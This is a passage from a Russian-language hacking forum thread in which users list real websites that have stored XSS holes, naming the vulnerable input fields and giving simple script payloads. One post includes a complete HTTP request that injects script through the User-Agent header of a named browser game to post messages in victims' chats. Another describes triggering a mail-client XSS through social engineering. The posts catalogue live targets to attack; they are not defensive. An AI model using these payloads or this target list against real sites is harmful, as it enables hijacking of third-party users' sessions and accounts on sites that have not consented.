Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. Kolja

    Kolja New Member

    Joined:
    17 Dec 2008
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    http://www.sgames.com.ua

    В поле для ввода коментариев к статье:
    <script>alert()</script>
     
  2. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    а ты уверен что это активная ?
     
  3. Kolja

    Kolja New Member

    Joined:
    17 Dec 2008
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    не уверен... хм...
     
    #283 Kolja, 21 Dec 2008
    Last edited: 21 Dec 2008
    2 people like this.
  4. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    #284 echobyte, 22 Dec 2008
    Last edited: 22 Dec 2008
  5. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    #285 iddqd, 27 Dec 2008
    Last edited: 27 Dec 2008
    3 people like this.
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Социальная сеть privet.ru

    PR:4
    тИЦ:1800


    В персональных сообщениях вставляем картинку с адресом javascript: и так далее....
    воен знае, что делать!!1
     
    2 people like this.
  7. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Nightlife.ua

    Крупный клубный портал.
    Везде, где есть комментарии- уязвимы теги вставки изображения и гиперссылки. В личных сообщениях тоже.

    Code:
    http://nightlife.ua/gallery/cat/1088/photo/44496/
    жмем на ссылку в коменте- и тут ололо пыщ пыщ алирт риальне!!11
     
    #287 iddqd, 29 Dec 2008
    Last edited: 29 Dec 2008
  8. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    UDAFF.COM

    В профиле пользователя уязвимо поле ICQ

    только для настоящих падонкаф!
     
    6 people like this.
  9. flem

    flem Member

    Joined:
    17 May 2008
    Messages:
    4
    Likes Received:
    8
    Reputations:
    0
    и фазына ххс в поиске
     
    1 person likes this.
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    blox.ua
    Укр. блоги.
    В теле поста голый js не проходит, но уязвимы многие теги(img, href etc).
     
    2 people like this.
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://www.voshod-avto.ru/catalogue.php?binn_rubrik_pl_catelems1=25609

    активное поле: "По наименованию:"

    P.S
    на alert у меня не сработало на на iframe срабатывает

    CMS: BinN S.Builder
     
    _________________________
    #291 winstrool, 12 Jan 2009
    Last edited: 12 Jan 2009
    2 people like this.
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://saret-auto.ru/model/pilot/configurator/#forma

    Уязвимы все поля кроме "Дополнительной информации:"
    тоже сработал только iframe
     
    _________________________
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    vorum.ru - вопросы и ответы на любую тему
    При заполнении профиля уязвимо поле "Имя". Но есть ограничение в 25 символов :(
     
  14. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    [email protected]

    В теле письма уязвим тег <img>
    Но злой фильтр превращает
    Code:
    javascript:alert()
    в
    Code:
    [B]x[/B]javascript:alert()
    :(

    А вот когда жертва нажимает "Reply"- код срабатывает. :)
    Так что в связке с СИ баг вполне рабочий. Проверено на Opera 9.63
    IE- не сработало :mad:
     
    3 people like this.
  15. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    http://www.articles.turne.com.ua/fotoreportazh-p-photo-716

    Уязвимо поле Имя при добавлении коментария !
     
    2 people like this.
  16. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    my.opera.com

    В профиле пользователя, в графе "Web site" принимается JS. Для срабатывания необходимо нажать на ссылку.

     
    1 person likes this.
  17. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    dbservermanager.com

    Уязвимы поля : "Your Name" and "Testimonial"

    aromatshop.com

    Уязвимы поля : "Имя:" and "Отзыв" во всех ID

     
    #297 ZEXEL, 16 Jan 2009
    Last edited: 16 Jan 2009
    8 people like this.
  18. TR0J@N

    TR0J@N Elder - Старейшина

    Joined:
    30 Mar 2007
    Messages:
    105
    Likes Received:
    58
    Reputations:
    13
    Активная XSS в NeverLands.ru
    Вообщем давно обнаружил, ну думаю выложу)
    Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!

    Пример использования:

    Code:
    POST http://www.neverlands.ru/game.php HTTP/1.0
    Accept: */*
    Referer: http://www.neverlands.ru/index.cgi
    Accept-Language: ru
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    [COLOR=Red]User-Agent:[/COLOR] [B]<script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>[/B]
    Host: www.neverlands.ru
    Content-Length: 58
    Pragma: no-cache
    Cookie: watermark=МЕТКО
    
    player_nick=[COLOR=Green]ЛОГИН[/COLOR]&player_password=[COLOR=Green]ПАСС[/COLOR]&x=1&y=1
    Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим

    Code:
    ЛОГИН: HACKED_BY_TROJAN_[IMG]http://s50.radikal.ru/i130/0901/82/ad5ae76cf1a4.gif[/IMG] 
    P.S. На момент публикации всё работает!

    27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")

    TROJAN (с)
     
    1 person likes this.
  19. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    И вновь i.ua

    Сервис "Объявления" - board.i.ua
    При заполнении формы уязвимо поле "Название товара"

     
    1 person likes this.
  20. lastsmile

    lastsmile Elder - Старейшина

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/)
    регистрируемся на форуме
    уязвимо поле ИМЯ